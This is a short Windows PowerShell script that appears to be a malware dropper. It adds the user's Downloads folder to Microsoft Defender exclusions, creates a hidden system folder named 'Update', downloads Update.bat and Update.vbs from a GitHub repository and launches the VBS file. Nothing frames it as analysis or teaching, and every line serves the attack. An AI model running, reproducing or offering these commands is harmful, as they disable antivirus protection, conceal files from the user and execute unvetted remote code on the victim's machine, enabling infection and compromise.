powershell -Command "Add-MpPreference -ExclusionPath $env:USERPROFILE\Downloads"
mkdir "$env:USERPROFILE\Downloads\Update"; attrib +h +s "$env:USERPROFILE\Downloads\Update"
powershell -Command "Invoke-WebRequest -Uri 'https://github.com/gbg379594/OS/raw/refs/heads/main/Update.bat' -OutFile '$env:USERPROFILE\Downloads\Update\Update.bat'"
powershell -Command "Invoke-WebRequest -Uri 'https://github.com/gbg379594/OS/raw/refs/heads/main/Update.vbs' -OutFile '$env:USERPROFILE\Downloads\Update\Update.vbs'"
cd "$env:USERPROFILE\Downloads\Update"
Start-Process "$env:USERPROFILE\Downloads\Update\Update.vbs"
